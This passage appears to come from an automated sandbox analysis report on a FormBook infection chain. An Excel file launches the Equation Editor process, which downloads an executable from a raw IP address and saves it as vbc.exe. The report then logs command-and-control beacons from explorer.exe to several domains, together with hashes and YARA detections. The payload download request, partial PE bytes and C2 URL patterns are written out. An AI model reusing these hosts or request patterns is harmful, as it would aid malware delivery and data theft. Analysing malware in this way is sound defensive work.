                                                                                                                                                                      Apr 12, 2021 14:45:20.831614971 CEST0OUTGET /winme/xles.exe HTTP/1.1
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                      Host: 3.125.17.227
                                                                                                                                                                      Connection: Keep-Alive


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      13.125.17.22780192.168.2.2249167C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Apr 12, 2021 14:45:20.875040054 CEST1INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 12 Apr 2021 12:45:15 GMT
                                                                                                                                                                      Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                                                                                                                                                      Last-Modified: Sun, 11 Apr 2021 17:55:36 GMT
                                                                                                                                                                      ETag: "ccc00-5bfb61ab42963"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Length: 838656
                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 33 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c0 0c 00 00 0a 00 00 00 00 00 00 8e de 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 de 0c 00 57 00 00 00 00 e0 0c 00 50 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 be 0c 00 00 20 00 00 00 c0 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 50 06 00 00 00 e0 0c 00 00 08 00 00 00 c2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 ca 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 de 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 30 eb 09 00 04 f3 02 00 03 00 00 00 39 00 00 06 88 e0 02 00 a8 0a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 71 1b 41 9f 31 e7 6f 65 3c bb 46 1b 41 0f 49 b5 18 12 b8 72 9c a0 37 51 c8 e2 0c 6a af 4a c5 42 5f 7d b2 21 e8 e0 b7 1f 27 21 bf 50 12 e1 aa 5b 38 f1 bb 20 a9 83 e0 53 b7 5d 97 d8 c1 ef 04 c6 e2 95 84 5a 7d 51 f8 c4 36 e1 9b bf 12 6f 85 4a bb e4 9e 11 e3 ca 3e 23 03 a9 9e 06 37 84 bf 35 4d 22 ca 57 c5 aa fb 0e 06 c3 05 e7 ba 9e 39 5e 62 43 f5 0f 09 cf fb 22 01 d1 63 0a 1e 40 6c 40 3d a5 d3 35 57 2c f0 9f 1c 47 8c aa 66 f8 bb 67 6d 89 a3 4c 5a a2 78 aa 72 8b 84 c4 2f 3d 86 de 51 81 11 a3 9f ab f7 59 24 2d c9 0a 94 65 5f 16 76 61 09 37 60 d4 78 05 09 aa 44 ab f4 aa fa 0b 9b 0f 46 30 b0 06 e1 81 11 0f 2a 4a b6 5e d6 f2 ee 25 bf 2b 52 03 db 92 85 49 b4 d8 69 08 fa 6f b5 69 f3 6a 8b f7 3a 5e d2 ff ee 37 bc 54 23 85 c6 d5 00 1b b6 5a b6 de 81 49 c5 2f ec 3b c6 3c e7 c2 c7 db 35 e5 95 67 15 d0 5c 62 e7 29 5a a4 42 77 09 88 c0 6a d2 5c 2a cc fe 38 7b 70 a9 5b 28 e4 2f a1 c8 bb 2e 08 06 95 d8 37 a6 06 24 86 71 d4 a3 c2 67 ab f5 33 7c 16 c7 6e b4 54 98 f9 28 17 a1 6a 5e a9 21 bc ee c4 a0 6e d1 aa 80 12 ba 2f b4 45 d8 de dd ae 8c e0 11 a0 ee ff ab 2b 14 1e da 82 28 11 35 6d 8c be a2 f6 8d 76 c2 08 78 ac 0b 8c 61 72 a2 96 9d 37 15 b5 52 87 76 3e 80 14 61 b6 42 de 45 96 2f 73 1b f2 1e b2 34 ad 6a 48 6c b2 f0 2e 8f cd d4 ce 86 df f0 49 95 bb ab
                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`3s`P @ @4WP H.text `.rsrcP@@.reloc@BpH09qA1oe<FAIr7QjJB_}!'!P[8 S]Z}Q6oJ>#75M"W9^bC"c@l@=5W,GfgmLZxr/=QY$-e_va7`xDF0*J^%+RIioij:^7T#ZI/;<5g\b)ZBwj\*8{p[(/.7$qg3|nT(j^!n/E+(5mvxar7Rv>aBE/s4jHl.I


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      2192.168.2.2249168192.169.223.1380C:\Windows\explorer.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Apr 12, 2021 14:46:19.490024090 CEST890OUTGET /p2io/?oN6xpP=r2GsjHfDgbadIobDkfqM84hqAY3LnZYXU2evLvxsfUtrrcQFCKudTBmZizgvXIWWwk1k1Q==&NreTZ=JJE0B4uP-Jd HTTP/1.1
                                                                                                                                                                      Host: www.centergolosinas.com
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Apr 12, 2021 14:46:20.703716040 CEST890INHTTP/1.0 400 Bad request
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                      Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      3192.168.2.2249169198.54.126.10580C:\Windows\explorer.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Apr 12, 2021 14:46:25.804739952 CEST891OUTGET /p2io/?oN6xpP=RfOK6jKkDjXJwasAc5LTyAppaXreGCTFIzs53vHZyU46XfbA28pKG07a1ZehGkxvOhkisQ==&NreTZ=JJE0B4uP-Jd HTTP/1.1
                                                                                                                                                                      Host: www.vectoroutlines.com
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Apr 12, 2021 14:46:26.001631975 CEST891INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      date: Mon, 12 Apr 2021 12:46:25 GMT
                                                                                                                                                                      server: Apache
                                                                                                                                                                      location: https://www.vectoroutlines.com/p2io/?oN6xpP=RfOK6jKkDjXJwasAc5LTyAppaXreGCTFIzs53vHZyU46XfbA28pKG07a1ZehGkxvOhkisQ==&NreTZ=JJE0B4uP-Jd
                                                                                                                                                                      content-length: 346
                                                                                                                                                                      content-type: text/html; charset=iso-8859-1
                                                                                                                                                                      connection: close
                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 65 63 74 6f 72 6f 75 74 6c 69 6e 65 73 2e 63 6f 6d 2f 70 32 69 6f 2f 3f 6f 4e 36 78 70 50 3d 52 66 4f 4b 36 6a 4b 6b 44 6a 58 4a 77 61 73 41 63 35 4c 54 79 41 70 70 61 58 72 65 47 43 54 46 49 7a 73 35 33 76 48 5a 79 55 34 36 58 66 62 41 32 38 70 4b 47 30 37 61 31 5a 65 68 47 6b 78 76 4f 68 6b 69 73 51 3d 3d 26 61 6d 70 3b 4e 72 65 54 5a 3d 4a 4a 45 30 42 34 75 50 2d 4a 64 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.vectoroutlines.com/p2io/?oN6xpP=RfOK6jKkDjXJwasAc5LTyAppaXreGCTFIzs53vHZyU46XfbA28pKG07a1ZehGkxvOhkisQ==&amp;NreTZ=JJE0B4uP-Jd">here</a>.</p></body></html>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      4192.168.2.224917023.82.57.3280C:\Windows\explorer.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Apr 12, 2021 14:46:31.438836098 CEST892OUTGET /p2io/?oN6xpP=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&NreTZ=JJE0B4uP-Jd HTTP/1.1
                                                                                                                                                                      Host: www.ruhexuangou.com
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Apr 12, 2021 14:46:31.636297941 CEST893INHTTP/1.1 200 OK
                                                                                                                                                                      Server: Tengine
                                                                                                                                                                      Date: Mon, 12 Apr 2021 12:46:31 GMT
                                                                                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Data Raw: 33 34 31 0d 0a 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 64 63 34 64 64 62 66 32 62 33 66 65 65 66 64 61 35 35 37 35 30 61 66 34 34 30 35 35 30 32 31 62 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 341<html><head><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?dc4ddbf2b3feefda55750af44055021b"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      5192.168.2.224917118.236.1.15780C:\Windows\explorer.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Apr 12, 2021 14:46:49.628072977 CEST895OUTGET /p2io/?oN6xpP=H0m9fF/8FL7QqYEOA4653EpAABAppk+gPA36EdDaEoCMlE2zCVYj51CG+i/1QazvQuiVHw==&NreTZ=JJE0B4uP-Jd HTTP/1.1
                                                                                                                                                                      Host: www.dreamcashbuyers.com
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Apr 12, 2021 14:46:49.829277039 CEST895INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Server: openresty/1.15.8.1
                                                                                                                                                                      Date: Mon, 12 Apr 2021 12:46:49 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 175
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Location: https://www.dreamcashbuyers.com/p2io/?oN6xpP=H0m9fF/8FL7QqYEOA4653EpAABAppk+gPA36EdDaEoCMlE2zCVYj51CG+i/1QazvQuiVHw==&NreTZ=JJE0B4uP-Jd
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      6192.168.2.224917252.58.78.1680C:\Windows\explorer.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Apr 12, 2021 14:46:54.987920046 CEST896OUTGET /p2io/?oN6xpP=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&NreTZ=JJE0B4uP-Jd HTTP/1.1
                                                                                                                                                                      Host: www.aideliveryrobot.com
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Apr 12, 2021 14:46:55.029727936 CEST897INHTTP/1.1 410 Gone
                                                                                                                                                                      Server: openresty/1.13.6.2
                                                                                                                                                                      Date: Mon, 12 Apr 2021 12:46:04 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 33 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 61 69 64 65 6c 69 76 65 72 79 72 6f 62 6f 74 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 66 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 61 69 64 65 6c 69 76 65 72 79 72 6f 62 6f 74 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 7<html>9 <head>53 <meta http-equiv='refresh' content='5; url=http://www.aideliveryrobot.com/' />a </head>9 <body>3f You are being redirected to http://www.aideliveryrobot.coma </body>8</html>0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      7192.168.2.2249173160.153.137.4080C:\Windows\explorer.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Apr 12, 2021 14:47:00.177253962 CEST897OUTGET /p2io/?oN6xpP=Ei6RqbmoUXtm0NxuUyb/BZtLNDk4B448l51n8Zz8P/g/u3IBdZc5bEJpDCmkA548du9Vog==&NreTZ=JJE0B4uP-Jd HTTP/1.1
                                                                                                                                                                      Host: www.shopihy.com
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:


                                                                                                                                                                      Code Manipulations

                                                                                                                                                                      Statistics

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Start time:14:44:54
                                                                                                                                                                      Start date:12/04/2021
                                                                                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                      Imagebase:0x13fc00000
                                                                                                                                                                      File size:27641504 bytes
                                                                                                                                                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:14:45:19
                                                                                                                                                                      Start date:12/04/2021
                                                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:543304 bytes
                                                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:14:45:21
                                                                                                                                                                      Start date:12/04/2021
                                                                                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                      Imagebase:0x1200000
                                                                                                                                                                      File size:838656 bytes
                                                                                                                                                                      MD5 hash:396071CF13F858E6677A6655A2D173BB
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 16%, Metadefender, Browse
                                                                                                                                                                      • Detection: 41%, ReversingLabs
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      General

                                                                                                                                                                      Start time:14:45:24
                                                                                                                                                                      Start date:12/04/2021
                                                                                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                                      Imagebase:0x1200000
                                                                                                                                                                      File size:838656 bytes
                                                                                                                                                                      MD5 hash:396071CF13F858E6677A6655A2D173BB
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      General

                                                                                                                                                                      Start time:14:45:26
                                                                                                                                                                      Start date:12/04/2021
                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:
                                                                                                                                                                      Imagebase:0xffca0000
                                                                                                                                                                      File size:3229696 bytes
                                                                                                                                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:14:45:44
                                                                                                                                                                      Start date:12/04/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\help.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\help.exe
                                                                                                                                                                      Imagebase:0x5e0000
                                                                                                                                                                      File size:8704 bytes
                                                                                                                                                                      MD5 hash:0F488C73AA50C2FC1361F19E8FC19926
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, Author: Joe Security
